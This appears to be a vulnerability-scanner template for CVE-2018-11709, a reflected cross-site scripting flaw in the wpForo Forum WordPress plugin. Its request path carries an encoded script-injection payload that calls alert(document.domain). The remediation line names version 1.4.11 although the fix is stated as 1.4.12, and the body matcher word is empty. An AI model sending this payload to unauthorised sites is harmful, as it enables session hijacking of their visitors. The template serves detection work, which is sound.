id: CVE-2018-11709 info: name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - https://wordpress.org/plugins/wpforo/#developers - https://wpvulndb.com/vulnerabilities/9090 - https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 epss-score: 0.00151 epss-percentile: 0.5127 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: gvectors product: wpforo_forum framework: wordpress tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors http: - method: GET path: - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100c0e97c1ea41c209ef04d29707d322f7b9b90b92cca23651fec6c97c3f632d48a022100c1a1b3c02128ce8527e66e8c45a1578f29fafe747072c7305f68bba1f1cfea1c:922c64590222798bb761d5b6d8e72950